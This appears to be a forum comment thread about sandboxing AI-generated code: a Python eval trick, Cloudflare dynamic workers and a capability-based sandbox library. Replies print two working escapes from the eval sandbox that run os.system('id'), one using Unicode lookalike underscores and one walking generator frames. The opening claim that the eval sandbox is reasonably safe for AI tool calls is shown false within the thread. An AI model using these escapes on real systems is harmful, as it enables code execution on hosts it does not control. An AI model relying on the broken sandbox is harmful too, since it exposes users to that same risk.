eval(YOUR_CODE.replace('__', ''), {'__builtins__': None}, {})
I saw this trick on reddit many years ago and wrote a blog post about it last month: https://blog.est.im/2026/stdout-09
I wasn't able to crack this sandbox, and neither could opus-4.6-thinking.
This sandbox won't protect you from DoS, but I think it's reasonably safe for AI tool calls. Just expose your MCP/RPC methods in the last {} and you're good.
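A minimal sketch of that pattern (the read_note tool and the ai_code string are made up for illustration, not from the original comment):

  notes = {"todo": "ship it"}

  def read_note(name: str) -> str:
      # Hypothetical MCP/RPC-style tool exposed to the model.
      return notes.get(name, "")

  # Stand-in for model-generated code.
  ai_code = 'read_note("todo").upper()'

  # Globals have no builtins; the last dict is the only API surface.
  tools = {"read_note": read_note}
  print(eval(ai_code.replace('__', ''), {'__builtins__': None}, tools))  # SHIP IT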
eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})
(The ﹍ here is U+FE4D DASHED LOW LINE. Python NFKC-normalizes identifiers at parse time, so _﹍init﹍_ is parsed as __init__, and the string-level .replace('__', '') never sees a literal double underscore.)
eval("(L:=[None],g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),L.clear(),L.append(g),bi:=g.send(None),bi['_'+'_import_'+'_']('os').system('id'))".replace('__', ''), {'__builtins__': None}, {})
I must have missed a lot of CTF lessons.
How about adding another .replace('﹍', '').replace('gi_frame', '')?
Cloudflare letting the LLM write a single JS function that executes the whole chain in an edge isolate is super smart. It finally offloads the agent's inner loop instead of round-tripping every tool call through the model.
I’ve been dealing with the exact same latency/reliability mess, but on the frontend. We ended up building an open protocol to let agents operate live UIs natively because vision and DOM-scraping loops are just painfully slow. Moving the actual execution engine as close to the target as possible (either an edge V8 isolate for APIs, or a native SDK for the frontend) seems to be the only real way out of the current "slow and expensive" agent phase.
  import nono_py as nono

  # Define capabilities
  caps = nono.CapabilitySet()
  caps.allow_path("/project", nono.AccessMode.READ_WRITE)
  caps.allow_file("/home/user/.gitconfig", nono.AccessMode.READ)

  # Apply sandbox (irrevocable)
  nono.apply(caps)

  # Your agent code runs here, fully sandboxed
  agent.run()
Example using Pydantic and FastAPI:
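A minimal sketch of what that could look like (the /eval route, EvalRequest model, and get_weather function are illustrative assumptions, not from the original comment):

  from fastapi import FastAPI
  from pydantic import BaseModel

  app = FastAPI()

  class EvalRequest(BaseModel):
      code: str  # the model-generated expression

  def get_weather(city: str) -> str:
      # Hypothetical RPC method exposed to the model.
      return f"always sunny in {city}"

  @app.post("/eval")
  def run_eval(req: EvalRequest):
      # The exposed dict is the "last {}" from the trick above.
      exposed = {"get_weather": get_weather}
      result = eval(req.code.replace('__', ''), {'__builtins__': None}, exposed)
      return {"result": result}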
What you would do is give the Worker a TypeScript RPC interface that lets it read the files -- which you implement in your own Worker. To give it fast access, you might consider using a Durable Object. Download the data into the Durable Object's local SQLite database, then create an RPC interface to that, and pass it off to the Dynamic Worker running on the same machine.
See also this experimental package from Sunil that's exploring what the Dynamic Worker equivalent of a shell and a filesystem might be:
Edit: I guess not:
> If your Dynamic Worker needs TypeScript compilation or npm dependencies, the code must be transpiled and bundled before passing to the Worker Loader.
https://developers.cloudflare.com/dynamic-workers/getting-st...
You could certainly set it up to allow the AI to import arbitrary npm modules if you want. We even offer a library to help with that: